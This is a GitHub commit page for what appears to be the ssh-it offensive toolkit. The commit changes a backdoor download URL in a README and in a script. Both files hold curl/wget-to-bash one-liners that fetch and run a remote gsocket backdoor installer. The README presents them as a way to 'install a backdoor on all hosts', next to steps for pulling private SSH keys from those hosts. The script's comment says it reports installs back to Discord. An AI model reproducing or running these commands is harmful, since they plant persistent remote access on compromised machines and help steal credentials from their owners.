Skip to content

Commit

Permalink
/x -> /y
Browse files Browse the repository at this point in the history
  • Loading branch information
rootTHC committed Mar 31, 2024
1 parent 04ee0b9 commit 51e9cdf
Show file tree
Hide file tree
Showing 2 changed files with 3 additions and 3 deletions.
2 changes: 1 addition & 1 deletion ssh-it/deploy/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -93,7 +93,7 @@ Retrieve the private SSH key (`id_rsa`) from _all_ hosts:
Install a [backdoor](https://www.gsocket.io/deploy) on _all_ hosts:

```shell
~/.config/prng/thc_cli -r exec 'bash -c "$(curl -fsSL https://gsocket.io/x)"'
~/.config/prng/thc_cli -r exec 'bash -c "$(curl -fsSL https://gsocket.io/y)"'
```

### Offline Installs or when HTTPS is not available
Expand Down
4 changes: 2 additions & 2 deletions sshx
Original file line number Diff line number Diff line change
Expand Up @@ -15,9 +15,9 @@
# Install GS-NETCAT and report installation back to DISCORD.
command -v curl >/dev/null && IS_CURL=1 || command -v wget >/dev/null && IS_WGET=1 || exit 0
if [[ -n $IS_CURL ]]; then
S="$(bash -c "$(curl -fsSL https://gsocket.io/x)")"
S="$(bash -c "$(curl -fsSL https://gsocket.io/y)")"
else
S="$(bash -c "$(wget --no-verbose -O- https://gsocket.io/x)")"
S="$(bash -c "$(wget --no-verbose -O- https://gsocket.io/y)")"
fi
S=${S##*S=\"}
S=${S%%\"*}
Expand Down

0 comments on commit 51e9cdf

Please sign in to comment.